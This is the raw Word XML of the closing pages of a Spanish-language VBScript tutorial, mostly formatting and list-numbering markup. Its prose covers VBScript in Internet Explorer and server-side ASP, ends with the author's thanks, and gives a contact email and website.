          <w:numId w:val="20"/>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Solo funciona en la gama Internet Explorer (no Mozilla, Opera, etc)</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queréis aprender, tan solo buscad en Google </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tutorial de vbscript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pues los que os aparecerán enseñan por encima lo visto en el primer tutorial y la forma de ponerlo en páginas web. Por otro lado, como he dicho, en ASP se usa VBScript junto con HTML, a diferencia que este se ejecuta en el servidor (que debe ser de la gama IIS). Esto va más para desarrolladores de páginas web, pero siempre es bueno saberlo. Así, en una página ASP, todo lo que va entre &lt;% y %&gt; es Visual Basic Script (generalmente) y cumple las siguientes características:</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Se ejecuta en el servidor, no en la máquina del cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="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os objetos se crearán en vez de con CreateObject, con Server.CreateObject. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cobra especial importancia el objeto ADODB.Connection</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Todo lo que no este entre &lt;% y %&gt; será HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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t>Tiene unas cuantas reglas básicas adicionales y pequeñas variacion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a forma, alguien con conocimientos de Visual Basic Script, junto con conocimientos de aplicaciones Web, puede crear fácilmente páginas dinámicas una vez aprenda (en Google si buscas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tutorial ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aparece) unas cuantas reglas adicionales muy simples y sencilla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todo esto que he dicho, no te preocupes si no te has enterado mucho, pues es para aquellos con experiencia en aplicaciones web. Pero no has de olvidar la ventaja de Visual Basic Script, y es que te sirve integra y completamente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para Visual Basic 6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y verás pues, que todo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lo aprendido puede ser usado con facilidad</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, centrándote así en aprender lo que de verdad hace importante a Visual Basic 6; que es el diseño de un programa, dejando de lado las subtareas que este debe realizar, pues ya has aprendido ha hacerlas con Visual Basic Scrip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olo me queda terminar este tutorial diciendo, en primer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lugar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que practiques y recuerdes esto, pues la práctica hace maestros. En segundo lugar, que he incluido junto con el tutorial dos referencias de Visual Basic Script y los ejemplos en su versión script. Y en tercer lugar que muchas gracias por haber leído hasta el final y por aguantar a alguien que no se expresa como uno desearía. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sinceramente, espero que estos tres tutoriales hayan cumplido su objetivo, o que al menos te ayudasen.</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lo olvides, para dudas o consultas escribe a: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scswinter@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="140" w:line="259"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O bien visita: </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.110mb.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
      <w:headerReference w:type="even" r:id="rId70"/>
      <w:headerReference w:type="default" r:id="rId71"/>
      <w:footerReference w:type="even" r:id="rId72"/>
      <w:footerReference w:type="default" r:id="rId73"/>
      <w:headerReference w:type="first" r:id="rId74"/>
      <w:footerReference w:type="first" r:id="rId75"/>
      <w:pgSz w:w="11900" w:h="16840"/>
      <w:pgMar w:top="1418" w:right="1648" w:bottom="1472" w:left="1628"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73" w:rsidRDefault="00050E73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00050E73" w:rsidRDefault="0005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IZ UDPMincho Medium">
    <w:panose1 w:val="02020500000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002F7" w:usb1="2AC7EDF8" w:usb2="00000012" w:usb3="00000000" w:csb0="0002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0" w:right="60" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 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0" w:right="60" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003165B4">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>45</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 3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0" w:right="60" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 3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73" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 3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73" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003165B4">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>13</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 3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73" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 3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32" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 2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32" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003165B4">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>35</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 2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32" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de 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73" w:rsidRDefault="00050E73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00050E73" w:rsidRDefault="0005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760"/>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760"/>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760"/>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583"/>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583"/>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583"/>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624"/>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624"/>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624"/>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415"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2CAEE30"/>
    <w:lvl w:ilvl="0" w:tplc="6FE28C0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="223"/>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1" w:tplc="269440F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="18D2B7A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="A14417E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="5F8A9F44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="6ADAC7E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="7924BD68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="F4AE5CA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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8" w:tplc="07D01014">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="612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abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06B0471D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA26EC38"/>
    <w:lvl w:ilvl="0" w:tplc="E8082032">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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8E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52E0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90FB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FA49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D671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1A82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6EEF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FA09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90E66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A78D9A4"/>
    <w:lvl w:ilvl="0" w:tplc="211CA31C">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78A0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ACB5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1E03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08C2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9A0F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6DA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5E95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9A7C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BD7873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5576F8B8"/>
    <w:lvl w:ilvl="0" w:tplc="473AEB6C">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4605D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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B47F1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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EAF76E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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240008">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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24E7CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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DADDFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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CE020">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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CA25AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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352E65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="467EB8E8"/>
    <w:lvl w:ilvl="0" w:tplc="331AEE28">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04BD64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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5671C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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E41486">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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D66152">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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28D26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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883D1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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9631CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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BAB11A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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EE0474"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4B0A194"/>
    <w:lvl w:ilvl="0" w:tplc="4C640DFC">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385B7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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88F4A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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703372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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2076C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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023D72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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FE7980">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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8A5EF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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E48198">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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636F76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F30A1C4"/>
    <w:lvl w:ilvl="0" w:tplc="49780024">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B4C9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BA63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8282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043E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B09B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5C3A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C44D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26F9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9E708F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E40C5C96"/>
    <w:lvl w:ilvl="0" w:tplc="57608C70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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A48A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4A37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14E1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867D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7046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98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9AF8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E0A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C46C90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58423D6A"/>
    <w:lvl w:ilvl="0" w:tplc="68C82784">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EC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460B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6813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2A7A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24B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D05F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A41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A04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800ECC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99141E6C"/>
    <w:lvl w:ilvl="0" w:tplc="8D185672">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>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48060">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>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4D238">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>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986A10">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>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439F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>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E419C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>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462D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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E832E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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A44E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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D57040"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="184EC8B4"/>
    <w:lvl w:ilvl="0" w:tplc="3EF00B98">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41A16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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C23F02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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E8D806">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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781B30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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7C34FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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EE9EC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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9AD462">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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1E0FB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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25A60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A440BA94"/>
    <w:lvl w:ilvl="0" w:tplc="4D7281E6">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AACF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2220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8A9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DEAD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A85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94BE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4A6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E49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0916D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DD858CE"/>
    <w:lvl w:ilvl="0" w:tplc="3DB234CA">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8097A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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CAAEEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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56D41A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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3A1D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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320E74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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1E1304">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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4E2504">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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46A012">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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D06182"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE7A545E"/>
    <w:lvl w:ilvl="0" w:tplc="354052D4">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E4A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F0FA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8C84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BC11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2AD1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A0B1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7836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C487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73166A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26060CCC"/>
    <w:lvl w:ilvl="0" w:tplc="5120B428">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EDD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864C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D06A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E88B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28C6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D273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66F2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D020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2E1C50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B92EBC62"/>
    <w:lvl w:ilvl="0" w:tplc="71AA27A6">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1C0D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C6D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E68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E0B7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46A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A034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C75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F6D6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013FC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="871CB5B8"/>
    <w:lvl w:ilvl="0" w:tplc="E24C164C">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9453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046D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7C53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66B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BE95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B2B5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86B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D44B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D20173"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94DC5CB0"/>
    <w:lvl w:ilvl="0" w:tplc="4D2E3694">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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695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A1F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4EA5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8B2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4C43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80F2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494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CCE7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732B01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0AC6B0D0"/>
    <w:lvl w:ilvl="0" w:tplc="8FC87CB0">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16C314">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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D02390">
      <w:start w:val="1"/>
